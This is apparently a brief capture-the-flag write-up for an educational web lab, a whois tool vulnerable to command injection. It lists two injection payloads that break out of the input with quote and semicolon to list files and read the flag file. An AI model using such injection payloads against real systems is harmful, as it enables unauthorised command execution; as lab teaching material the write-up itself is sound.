Simple Web - 0x02(Lab - Whois Tool)
tags: CTF Web eductf
Challenge: https://whoistool.ctf.zoolab.org/
Background
Almost the same as 0x10(Lab - DNS Lookup Tool | WAF)
Source Code
1 | |
Exploit
- Payload:
";ls -al;"
- Payload:
";cat flag.t*;"Then we got flag!!!